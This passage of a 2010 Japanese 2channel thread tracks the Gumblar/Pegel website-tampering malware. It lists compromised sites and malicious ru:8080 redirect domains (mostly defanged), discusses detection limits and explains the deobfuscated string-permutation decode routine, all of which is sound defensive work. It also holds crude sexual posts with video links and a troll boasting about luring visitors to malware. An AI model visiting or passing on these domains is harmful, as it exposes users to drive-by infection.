797 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 09:44:23 ]: IEじゃなければ機能しないみたいだからFirefox使いなら無用の長物だな
798 名前：名無しさん＠お腹いっぱい。 [2010/02/17(水) 09:49:58 ]: 「Internet SagiWall」 Yahoo!プレミアム会員は無料

online.security.yahoo.co.jp/sagiwall/index.html

ヒューrスティックブロックは完ぺきではないみたい。
sagiwallを通過してNODが反応してた。
NOD通過してaviraが反応するものも…
厄介なのは　亜種　かな～
799 名前：名無しさん＠お腹いっぱい。 [2010/02/17(水) 09:50:44 ]: ↑
ごめんURLそのまま貼ってしまった
800 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 10:03:35 ]: >>636 >>640
スクリプトが変化してて、スクリプトが超長くなってるんだけど
801 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 10:05:48 ]: >>798
PhishWallサーバーを導入しているサイトは正規のサイト(フィッシングサイトではない)と表示されるのだが、
その正規のサイトがガンブラーに感染していたらどうなるんだろうな。
ttp://www.securebrain.co.jp/products/sagiwall/function.html
802 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 10:18:16 ]: >>801
PhishWallがいち早く改ざんアラートを出すらしいし
設定によってはメンテナンス画面に切り替えてアクセス不能にするらしい
これらがちゃんと機能するなら問題なさそうだが…
803 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 10:45:13 ]: >>802
語弊があるけど、もとから改ざんされていたら検知できないよな。
804 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 11:48:18 ]: そんなマイナーなものまで導入しているサイトより
バージョンアップすらしない危機管理できないサイトが
圧倒的に改竄されているのが現実。
805 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 12:11:38 ]: >>798
32bit OSのみ対応だってさ Orz
806 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 12:25:02 ]: どーでもいいけど詐欺wallってネーミングなんかにどーしてしたんだろう
一瞬マルウェア食わせるフェイクセキュリティソフトかと思った
807 名前：名無しさん＠お腹いっぱい。 [2010/02/17(水) 12:28:26 ]: www●shindaihome●com
またスクリプト変わってない？
808 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 12:33:46 ]: >>806
ファイアウォール　炎を防ぐ壁

フィッシュウォール　フィッシングを防ぐ壁
詐欺ウォール　詐欺を防ぐ壁

センスのなさに異存はないぞ。
809 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 12:35:02 ]: www●momo-food●co●jp/index●html
ここも新コードに変わってますね
VirusTotal無反応
810 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 13:24:18 ]: JavaScriptのコードの書き方は無限にあるといえる。
コードのパターンマッチングなぞ意味をなさない。
砂場で実行してみるしか手はないのでは。
811 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 13:25:48 ]: ○砂箱
×砂場

だろJK
812 名前：名無しさん＠お腹いっぱい。 [2010/02/17(水) 13:26:29 ]: 連絡しても対処しない。
こんなさいときりがない
dagaya●arigatougozaimasu-jp●com
813 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 13:33:05 ]: 感染しました　かろうじて動いています
814 名前：名無しさん＠お腹いっぱい。 [2010/02/17(水) 13:34:57 ]: >>809
スクリプトは記述あるけどウイルス本体につながってない予感
ESET
AVIRA
いずれもヒューリスティックレベルを高くしてる
でも無反応

一時フォルダをオンラインスキャンしても検出なし
815 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 13:52:18 ]: >>814
ソースを見て、スクリプト＝感染の危険性という判断のみで
書き込みましたが、種なしというオチは想定してませんでしたｗ
わざわざ確認していただいてすいません
816 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 13:52:31 ]: ソース内にvarが50以上あるものすべて怪しい
って判断で十分なきがするんだが
817 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 13:55:25 ]: wikimedia-org●meetup●com●dailymotion-com●recentmexico●ru:8080/nifty●com/nifty●com/alot●com/google●com/mozilla●com/
818 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 14:21:40 ]: >>807
おっと、403だ。対処中か。
819 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 14:23:19 ]: sina-com-cn●pornorama●com●webmasterworld-com●livesitedesign●ru:8080/google●com/google●com/google●dk/wellsfargo●com/guardian●co●uk/
momoのサイトのJavascriptの指定先？
820 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 14:28:31 ]: 毎日違うfile.exeがDLされるが、相変わらず感染しない件ｗ
あと、ここで新たに報告されてるやられたサイトのjavascriptもほとんど動作していない件ｗｗ
スクリプトが埋め込まれた時点で対策必須だから、動作しないサイトは不幸中の幸いだねｗ
821 名前：名無しさん＠お腹いっぱい。 [2010/02/17(水) 15:19:10 ]: 古いスクリプトだけど
info0825●com
822 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 15:50:27 ]: マスターペニス
823 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 15:56:15 ]: www.hellowork.go.jp/
824 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 16:11:22 ]: >823
おいカス
PCぶっ壊れたぞ如何してくれんだ氏ね
825 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 16:41:21 ]: >>651まだ消えていないのか
いい加減消してやれよ
826 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 16:44:14 ]: また火狐野郎がてきとうぶっこいてるのか
Macつかえ
827 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 16:45:28 ]: こMaった
828 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 17:02:04 ]: >>644
名前がダサいし覚えにくいな。
829 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 17:10:58 ]: Pegel葉山
830 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 17:36:58 ]: www2.odn.ne.jp/2711726/style/index.html
これがウイルスサイトなんですが
踏むとどうなるんですか？
831 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 17:37:27 ]: 直リンすんなバカ
832 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 17:39:00 ]: >>811
sandboxの訳は砂場でもあってるので間違いじゃない
833 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 17:39:18 ]: www.aguse.jp/ではとくに何も出なかったが？
どうなんだろう？
834 名前：名無しさん＠お腹いっぱい。 [2010/02/17(水) 17:44:09 ]: >>831
おまえが踏め！ゴミカス
835 名前：名無しさん＠お腹いっぱい。 [2010/02/17(水) 17:45:02 ]: >>834
>>1を少しは読めよ
836 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 17:50:09 ]: 見せしめのために運営に言っておいたほうがいいな
直リン基地外うざす
837 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 17:51:29 ]: >>833
>>831のこと？
外部スクリプトのアドレスに8080と出ているだろう？
838 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 17:52:22 ]: >>830
sR=の後に大量に並んでる数字はなんなんだ
839 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 17:56:57 ]: >>830
freelotto-com●cdiscount●com●bloomberg-com●livesitedesign●ru:8080/cncmax●cn/cncmax●cn/google●ae/wp●pl/google●com/
を流していた。
840 名前：へたれ発掘屋 mailto:sage [2010/02/17(水) 18:11:41 ]: 本日も投下

//skimzone●hp●infoseek●co●jp/pdiary/wm2004_08_14/index●htm

子どもと生活文化協会（CLCA）
//www●clca●or●jp/index●html
↑↑↑ＮＰＯ法人↑↑↑

--
>>786
「せーふぶらうじんぐ」
ttp://www.google.com/safebrowsing/diagnostic?site=【調べたいドメイン】&hl=ja
例：ttp://www.google.com/safebrowsing/diagnostic?site=sakura.ne.jp&hl=ja
841 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 18:26:41 ]: "replace(/ﾎﾆｬﾗﾗ/, '')" だらけだった（検出の一つの目安にはなった）のが、
難読化用の文字列置換関数を独自に書き始めたんだね。

この関数部分はそれこそどうとでも書ける（パターンが存在しない）し、
もはやパターンマッチングによる検出は限界にきてると思うよ。
842 名前：へたれ発掘屋 mailto:sage [2010/02/17(水) 18:31:38 ]: //kabuto●bz/digitalgirl/talentlist/index●html

<script>function ←(ﾟ∀ﾟ)!!
www●fx-dealer●jp/qa/index●html

<script>function ＝ 8080系でおｋ？
843 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 18:32:54 ]: >>841
実行した結果で判断すればおｋだろ
tracemonkeyやv8辺りにスクリプトを突っ込んで実行結果をチェック
844 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 18:34:52 ]: だからそれってパターンマッチによる検出は限界きてるってことじゃね？
845 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 18:36:19 ]: チェッカーの中の人はどう実装すんのかな
846 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 18:39:31 ]: うーん、これはphpでの復号は難しそうな予感。
検出は簡単に出来ると思いますが・・・
847 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 18:39:38 ]: ウィルス作者がニヤニヤしてチェッカーの対応を見守っていたりして
848 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 18:39:47 ]: >>844
先走りｽﾏｿ
849 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 18:42:39 ]: 改ざんするならせめて親切に <gumblar>...</gumblar> タグで囲んでほしいよな
850 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 18:43:23 ]: 作者死ね
851 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 18:46:09 ]: >>842の上の方
複号が変なところなので修正します。

>>840
対応してみます。
ただ、復号が無理っぽそうです
852 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 18:49:01 ]: >>849
まるでEvilビットのようだ・・・
853 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 18:51:46 ]: 壷とかニコニコもそろそろヤバそうだな…
もう完全に目付けられてんじゃん
854 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 18:58:20 ]: >>842の上の方
修正しました。
855 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 19:08:13 ]: >>830
www.virustotal.com/jp/analisis/f4fbb95cd44edc587c83c0c4c4e509931976a12ffc7968f9e3a990e22ee3560c-1266400439

サイト持ちの方
ウイルスが埋め込まれているか否かではなく
改竄されて否かいるかなのです。

改竄があれば貴方のPCにウイルスが侵入してる可能性があり
貴方のサイトを閲覧した方にも危険が及ぶのです。

責任を放棄する方には相応の報いが。。。
856 名前：名無しさん＠お腹いっぱい。 [2010/02/17(水) 19:08:25 ]: gumblarウイルス蔓延でウハウハなひとはだれですか？
857 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 19:12:42 ]: ここの住人
858 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 19:13:07 ]: >>840
実験的に対応しました。
859 名前：修正 mailto:sage [2010/02/17(水) 19:13:25 ]: >>855
＞改竄されて否かいるかなのです。

改竄されているか否かなのです。

ｗｗ
860 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 19:47:32 ]: 修正申告がなかったらミスタイプに気付かなかった俺

人間って前後関係から勝手に脳内修正して普通に読んじゃうんだな
861 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 20:00:13 ]: 表面的なパターン検索してるだけのちぇっカなんぞ
862 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 20:02:46 ]: lowes-com●aebn●net●youku-com●sitemape●ru:8080/play●com/play●com/masrawy●com/google●com/verizonwireless●com/
863 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 20:11:45 ]: 作者には、:8080 以降のドメイン風パスに
/pc11.2ch.net/test/read.cgi/sec/1265387369/
を含めるくらいの茶目っ気が欲しいところだね。
864 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 20:12:42 ]: どゆこと？
("oogelgoc.m", [2,1,0])
googel.com
865 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 20:16:42 ]: >>862
こうなの？
("omcsi.emtpearu.80:80", [2,0,1])
com●sitemape●ru:8080
866 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 20:18:58 ]: 作者が独自に実装したデコード関数だろ

デコード前の文字列、構成文字の順序が
それほど大きく入れ替わってるわけでもないので
じっと見てると脳内デコード出来るけどなｗ
867 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 20:38:58 ]: 感染確認・駆除ツールって同じメーカーのアンチウィルスソフト入れないと動作しない？

トレンドマイクロオンラインスキャン使う場合
ウイルスバスター必須あるいはavast、MSE等との競合の恐れありとか
868 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 20:40:59 ]: 配列を使って入れ替えているだけで独自でも何でもないよ
869 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 21:16:57 ]: jane styleで使えるGumblar Checker 3のコマンド教えてくれ
870 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 21:38:52 ]: URLを右クリックしてGumblar Checker 3をクリックする
871 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 21:38:54 ]: >>869
>>370
872 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 21:46:49 ]: ウィルスサイトを貼り付けてる人を通報するのは、どうしたら良い？
ここのスレじゃないんだけどさ。スレ違いでごめん
873 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 21:48:10 ]: F("string", [2, 0, 1]) 系のデコード関数は、解読する気力を萎えさせる為に
デコード処理に全く関係のない無意味な処理がゴマンと記述してある。

で、ゴミを削ぎ落とした実態がコレ↓だね。

function F(str, arr) {
    var strlen = str.length;
    var arrlen = arr.length;
    var p = "";
    for (var i = 0; i < strlen; i += arrlen) {
        var s = str.substr(i, arrlen);
        if (s.length == arrlen)     for (var j in arr) p += s.substr(arr[j], 1);
        else p += s;
    }
    return p;
}

要は、str を頭から順に配列 arr の長さ分ずつ切り出し、
切り出されたそれら各部分文字列について、
その構成文字を arr の要素に合わせて並べ替えているんだな。
（配列の長さ分に満たない切れ端は、並べ替えないでそのまま使う）
874 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 22:02:27 ]: ("oogelgoc.m", [2,1,0])
　　　　↓
oog　elg　oc.　m
210 210 210
　　　　↓
goo　gle　.co　m
　　　　↓
google.com

というわけか
875 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 22:10:08 ]: ちょっと違う。（その例の場合はたまたま最終的に一致する）

oog　elg　oc.　m
012 012 012

というふうにまずは各部分文字列（の構成文字）に自然に付番して、
それを arr の要素の並び（今の場合 2,1,0）順に抽出していく。
876 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 22:21:22 ]: Gumblar亜種に代わって今度は「Pegel」が拡大：カスペルスキー警告
japan.cnet.com/news/sec/story/0,2000056024,20408679,00.htm
　Kaspersky Labs Japan（カスペルスキー）は2月16日、「Gumblar」の亜種に代わって
「Pegel（ピーゲル）」による日本国内の大手企業ウェブサイト感染を確認したと発表した。
感染後の対策が十分に取られていないケースも見られるという。

　Gumblar亜種と同様にウェブ誘導型のマルウェアであるPegelは、改ざんされた正規のウェブサイトを閲覧したユーザーを
ru:8080などの不正サイトに誘導する。
改ざんで正規のウェブページが感染源になってしまう点、そのウェブサイトにアクセスしたPCが
不正プログラムに感染させられ、新たな感染源となって2次、3次の被害が拡大し続ける点が特徴としている。

　Pegelの攻撃は、正規のウェブサイトが改ざんされ、不正ページへリダイレクトするスクリプトが埋め込まれているために
閲覧するユーザーは表面上の変化を感じられず知らない間に感染の危険性に晒されることになる。
また、さまざまなマルウェアのダウンロードが次々に試みられる可能性もあるため
カスペルスキーでは感染が確認された場合、OSの再インストールを勧めている。
877 名前：名無しさん＠お腹いっぱい。 [2010/02/17(水) 22:25:41 ]: >>876
ロシアです♪
と言いたいところだが本当だ。
当時はピンサロ平塚ジャンジャンが有名で
ロシア人とのハーフである光月夜也のまんまんを
ペロンペロンに舐めまくっていた。
ボーッとしてると従業員に「お客さんちゃんと舐めてくださいよ」と
叱られた記憶もある。
花びら3回転だったしもちろん生尺。
近所の紅花という定食屋でサインを貰おうとした記憶がある。

ttp://www.yourfilehost.com/media.php?cat=video&file=pinsaro_part001.wmv
ttp://www.yourfilehost.com/media.php?cat=video&file=pinsaro_part002.wmv
ttp://www.yourfilehost.com/media.php?cat=video&file=pinsaro_part003.wmv
878 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 22:29:19 ]: >>872
qb5.2ch.net/sec2chd/
879 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 22:37:12 ]: もうさ、JavaScriptすらいらないシンプルなウェブに回帰しようよ

パトラッシュ、僕もう疲れたよ・・・
880 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 22:38:31 ]: 【Gumblar/Pegel】Web改竄ウイルス総合スレ6【8080/GENO】
881 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 22:40:20 ]: >>879
俺もだよ…
いつになったらこんなこと終わるんだ…
つーかさっさと作者を捕まえろよ無能警察が！
882 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 22:41:55 ]: >>881
国内に作成者がいるとでもおもってんの？
883 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 22:43:07 ]: カスペは何故、Pegelと命名したのか。
ＧＥＮＯから尾長いされたか？　
884 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 22:51:10 ]: 誰かFirefoxかIEでjavascriptを通常は使用せずに例外等で登録されたページのみ使用するようなアドオン知らない?
885 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 22:52:40 ]: 光月夜也＞＞＞＞＞佐々木希
886 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 22:52:45 ]: 作者のプロファイル。

はじめは２人か３人でＶｉｒｕｓの作り拡散させたが現在は１人。
日本語がなんとかわかるか、もしくは、日本語を解する複数のオタク系友人がいる。
留学生の可能性があり、素人童貞である。
887 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 22:54:20 ]: 犯人は20代から30代、もしくは40代から60代
パソコンのプログラミングに詳しい男性あるいは女性
888 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 22:58:39 ]: >>886
>>留学生の可能性があり、素人童貞である。
素人童貞の根拠は？
889 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 22:59:08 ]: >>884
NoScript じゃダメでつか
890 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 22:59:58 ]: 犯人がお仕置き受けてるよ。
001.pinknotora.net/av/src/893-45.jpg
891 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:00:59 ]: 投下
//www●hikky-country●net/cgi/ftb/index●htm
892 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:04:59 ]: >>891
ページが見つかりません
893 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:05:11 ]: これってサイトから感染する以外の経路はあるの？
例えばメールによるファイルのやりとりとか…
894 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:05:50 ]: また火狐野朗が自演してるのか
のうすくりぷとすごいですね
895 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:06:39 ]: >>893
スレタイをよく読んでほしい
896 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:07:44 ]: 脆弱ふさいどきゃ平気
897 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:08:05 ]: >>894
22:59:08から約5分か
さすがだな
898 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:09:48 ]: わたしなどまだまだです
899 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:10:14 ]: 多くは異性との性交渉で感染します
900 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:11:27 ]: なんだ、なら俺は大丈夫だ。
901 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:12:46 ]: 同性もダメ
902 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:17:08 ]: ぬこもダメ
903 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:17:23 ]: >>882
思ってねーよ
そいつがいる国の警察だよ
904 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:19:40 ]: ピーゲルって名前になったのか
905 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:20:25 ]: >>891
htmlだろ拡張子
906 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:21:06 ]: >>889
それはGENOウィルスの時に一度入れて使ってみたけど使い心地が悪かった

と言うか例外サイト登録できたっけそれ?
907 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:22:40 ]: できなきゃわざわざ使う意味ないじゃん
908 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:26:02 ]: ↓火狐野郎がどうのこうの
909 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:26:47 ]: >>903
その国に取り締まる法律があるかわからんのに
なんで警察が動くって思えるの？
910 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:29:53 ]: こまけー人だね
911 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:31:20 ]: 小学生みたいな質問だな
先生に何でもかんでも質問攻め
912 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:33:42 ]: 火狐野郎がどうのこうの
913 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:34:11 ]: 目には目を歯には歯を、を地でいくような国の人間が犯人だと
刑罰はPCにウイルス植え付けられて終わりなのかなｗ
914 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:36:00 ]: PC破壊じゃね?
で、破壊されたゴミを一かけらも残さず持ち帰らせると
915 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:43:09 ]: >>884
プニル
916 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/17(水) 23:47:43 ]: 答えになってねえｗ
917 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 00:13:21 ]: 別にアドオンとか使わなくても、IEもFirefoxも本体機能だけで>>884の望む動作は可能だけど
使い心地がどうのとか返される可能性が高いと思えたので答えるのはやめておく。
918 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 00:24:44 ]: 使い心地とか言われてもな
919 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 00:29:02 ]: どうしても安全性とはトレードオフになってしまうんだがな
920 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 00:29:15 ]: どうでもいいから巣でブラウザ戦争しろよ
921 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 00:48:46 ]: 感染確認でググッたら、
Cドライブの「sqlsodbc.chm」というファイルを検索して下さい。
ファイルのサイズが「50,727バイト」になっていたら正常です。
GENOウイルスに感染していると、ファイル容量が異なります。
※ファイル内容が書き換えられているため。

とあったので調べたらそれよりサイズ小さかったから、
やばいと思ってマカフィーで調べたら問題なかった
ファイルが小さいのはなんでだろう
922 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 00:51:35 ]: あっすくされてるんじゃね
923 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 01:04:05 ]: >>921
soudan1.biglobe.ne.jp/qa4971078.html
924 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 01:55:02 ]: >>923
ありがとうございました
925 名前：（＇д＇） ◆yUyb3Tqn92 mailto:踏ませ師 [2010/02/18(木) 04:34:10 ]: (＇Д＇)ブアハハハハハハハハハハハハハハハハハハハハハハハハハハハハハッハハー！
2010年に入ってからもう云万人に踏ませたぜーい：(＞ｗ＜)：踏んだ奴らざまぁああっぁぁ！
926 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 06:14:51 ]: そんな行く先々で足蹴にされているのか

まぁ何だ、強く生きろ
927 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 06:20:04 ]: Adobe Flash Playerの更新キタっぽい？
928 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 06:29:46 ]: こないね16日って言うのは記事の間違いじゃないか
それらしいことadobeのサイトに書いてあるの見つからなかったけど
929 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 06:40:58 ]: そのアップデートって言うのは
すでにリリースされてる10.0.45.2のことだろ
16日に修正されるというのは訳の間違いっぽい
元の文もはっきりしないが
930 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 06:51:24 ]: 12日…Flash Player 10.0.45.2およびAdobe AIR 1.5.3.1930
16日…Adobe Reader と Adobe Acrobat の 9.3.1/8.2.1
じゃないの？
931 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 07:18:08 ]: そうだと思うけど
この記事に書いてあるからだろ
japan.cnet.com/news/sec/story/0,2000056024,20408437,00.htm
932 名前：（＇д＇） ◆yUyb3Tqn92 mailto:踏ませ師 [2010/02/18(木) 09:04:39 ]: (＇д＇)安心せい
俺様は一人じゃない
沢山いる
933 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 10:31:50 ]: 今、Adobe Flash Playerしたところだ
934 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 10:46:55 ]: >>933
日本語でおｋ？
935 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 11:17:38 ]: 田舎イルカ！
936 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 12:01:47 ]: Adobe Readerアップデートするたびにスタートアップに登録するのやめて欲しいわ
937 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 12:56:56 ]: 毎度。
sqript●net ← indexが改ざん
t-station●tv ← indexが読み込むjsファイルが改ざん

もう疲れたよ…
938 名前：名無しさん＠お腹いっぱい。 [2010/02/18(木) 12:59:51 ]: www●atam37●com
www●bamu7●com
www●camu7●com
www●eamu7●com
www●famu7●com
www●gamu7●com
www●tako45●com

デジロックは通報しても全く止まらない
939 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 13:30:01 ]: デジロのサポートは崩壊状態だからな
940 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 15:19:02 ]: Gumblar Checker 3で、外部jsファイルの検出に対応しました。
リストを開くと、外部jsファイルのURLが表示されます。その外部jsファイルのURLから、そのjsファイルをチェックすることが可能です。

gumblar.s1.dynamitelife.net/ver3/
941 名前：名無しさん＠お腹いっぱい。 [2010/02/18(木) 15:24:43 ]: http://●opi.dtiblog.●com/blog-entry-5028.●html
これは大丈夫ですか？
942 名前：（＇д＇） ◆yUyb3Tqn92 mailto:踏ませ師 [2010/02/18(木) 15:27:07 ]: このスレでむやみにURL開くバカはいないから普通に貼っていいよ
俺が許可する( ´,дゝ`)
943 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 15:51:24 ]: >>921
そもそもその確認方法は古すぎて意味がない
>>941
ここは安全確認スレじゃない
944 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 15:52:39 ]: >>942
危険なURLを別のスレばら撒け
945 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 16:17:01 ]: >>941
＞http://●
ってところで釣り
946 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 16:23:27 ]: ここやられてる疑いがあるんだが
www●candyfruit●com
947 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 16:35:48 ]: >>938
デジロックのサポートをあてにしてはいけない
948 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 16:41:23 ]: 最近file.exeは凄いな。
完全にラスボス化して来た。
あらゆるウイルスをくっつけて見ました。的状態になってるし。
感染隠す気もゼロだよ。
「your system is infected!」ってデカデカ書かれた背景に変わり、
インチキソフトが勝手にウイルス検索し始めて、インチキサイトに誘導して
クレジットのカードナンバーゲットしようとしてたり。
buy-security-essentials●com

作ってる本人が面白くなって来たんだろうな。
実用性ゼロの作品になってる。
949 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 16:52:04 ]: > ここやられてる疑いがあるんだが

なんでそう思うのか具体的に
950 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 16:52:59 ]: 判定スレじゃねえっつってんのに
951 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/18(木) 16:53:15 ]: こういう奴はいずれ功名心が仇となって足がつく。
